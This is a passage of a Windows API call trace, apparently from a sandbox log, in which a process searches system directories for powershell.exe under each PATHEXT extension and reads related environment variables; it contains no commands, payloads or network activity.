	[0327.249] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.249] SetErrorMode (uMode=0x1) returned 0x1
	[0327.249] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.249] SetErrorMode (uMode=0x1) returned 0x1
	[0327.250] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.250] SetErrorMode (uMode=0x1) returned 0x1
	[0327.250] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.250] SetErrorMode (uMode=0x1) returned 0x1
	[0327.250] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.250] SetErrorMode (uMode=0x1) returned 0x1
	[0327.251] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.251] SetErrorMode (uMode=0x1) returned 0x1
	[0327.251] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.251] SetErrorMode (uMode=0x1) returned 0x1
	[0327.251] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.251] SetErrorMode (uMode=0x1) returned 0x1
	[0327.251] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.252] SetErrorMode (uMode=0x1) returned 0x1
	[0327.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.252] SetErrorMode (uMode=0x1) returned 0x1
	[0327.252] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.252] SetErrorMode (uMode=0x1) returned 0x1
	[0327.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.252] SetErrorMode (uMode=0x1) returned 0x1
	[0327.253] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.253] SetErrorMode (uMode=0x1) returned 0x1
	[0327.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.253] SetErrorMode (uMode=0x1) returned 0x1
	[0327.253] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.253] SetErrorMode (uMode=0x1) returned 0x1
	[0327.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.254] SetErrorMode (uMode=0x1) returned 0x1
	[0327.254] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.254] SetErrorMode (uMode=0x1) returned 0x1
	[0327.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.254] SetErrorMode (uMode=0x1) returned 0x1
	[0327.254] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.255] SetErrorMode (uMode=0x1) returned 0x1
	[0327.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.255] SetErrorMode (uMode=0x1) returned 0x1
	[0327.255] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.255] SetErrorMode (uMode=0x1) returned 0x1
	[0327.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.255] SetErrorMode (uMode=0x1) returned 0x1
	[0327.256] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.256] SetErrorMode (uMode=0x1) returned 0x1
	[0327.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.256] SetErrorMode (uMode=0x1) returned 0x1
	[0327.256] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.256] SetErrorMode (uMode=0x1) returned 0x1
	[0327.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.257] SetErrorMode (uMode=0x1) returned 0x1
	[0327.257] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.257] SetErrorMode (uMode=0x1) returned 0x1
	[0327.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.257] SetErrorMode (uMode=0x1) returned 0x1
	[0327.257] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.257] SetErrorMode (uMode=0x1) returned 0x1
	[0327.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.258] SetErrorMode (uMode=0x1) returned 0x1
	[0327.258] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.258] SetErrorMode (uMode=0x1) returned 0x1
	[0327.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.258] SetErrorMode (uMode=0x1) returned 0x1
	[0327.258] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.259] SetErrorMode (uMode=0x1) returned 0x1
	[0327.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.259] SetErrorMode (uMode=0x1) returned 0x1
	[0327.259] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.259] SetErrorMode (uMode=0x1) returned 0x1
	[0327.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.260] SetErrorMode (uMode=0x1) returned 0x1
	[0327.260] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.260] SetErrorMode (uMode=0x1) returned 0x1
	[0327.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.260] SetErrorMode (uMode=0x1) returned 0x1
	[0327.260] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.261] SetErrorMode (uMode=0x1) returned 0x1
	[0327.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.261] SetErrorMode (uMode=0x1) returned 0x1
	[0327.261] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.261] SetErrorMode (uMode=0x1) returned 0x1
	[0327.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.261] SetErrorMode (uMode=0x1) returned 0x1
	[0327.262] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.262] SetErrorMode (uMode=0x1) returned 0x1
	[0327.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.262] SetErrorMode (uMode=0x1) returned 0x1
	[0327.262] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.262] SetErrorMode (uMode=0x1) returned 0x1
	[0327.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.263] SetErrorMode (uMode=0x1) returned 0x1
	[0327.263] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.263] SetErrorMode (uMode=0x1) returned 0x1
	[0327.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.263] SetErrorMode (uMode=0x1) returned 0x1
	[0327.263] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x4e7df0
	[0327.264] FindNextFileW (in: hFindFile=0x4e7df0, lpFindFileData=0x1c9cde90 | out: lpFindFileData=0x1c9cde90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0327.265] FindClose (in: hFindFile=0x4e7df0 | out: hFindFile=0x4e7df0) returned 1
	[0327.265] SetErrorMode (uMode=0x1) returned 0x1
	[0328.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c9cdfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0328.292] SetErrorMode (uMode=0x1) returned 0x1
	[0328.293] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c9ce1b0 | out: lpFileInformation=0x1c9ce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0328.293] SetErrorMode (uMode=0x1) returned 0x1
	[0328.752] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0328.752] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0328.752] CoTaskMemFree (pv=0x5185a0) 
	[0329.373] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0329.373] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.373] CoTaskMemFree (pv=0x5185a0) 
	[0329.376] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0329.376] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.376] CoTaskMemFree (pv=0x5185a0) 
	[0329.386] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0329.386] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.386] CoTaskMemFree (pv=0x5185a0) 
	[0329.940] CoTaskMemAlloc (cb=0x3b) returned 0x1b8c0540
	[0330.552] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c9ce398, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c9ce398) returned 0x4550
	[0330.552] CoTaskMemFree (pv=0x1b8c0540) 
	[0330.555] GetConsoleWindow () returned 0x201c6
	[0330.561] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0330.561] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0330.561] CoTaskMemFree (pv=0x5185a0) 
	[0330.562] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0330.562] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0330.562] CoTaskMemFree (pv=0x5185a0) 
	[0330.567] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0330.567] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0330.567] CoTaskMemFree (pv=0x5185a0) 
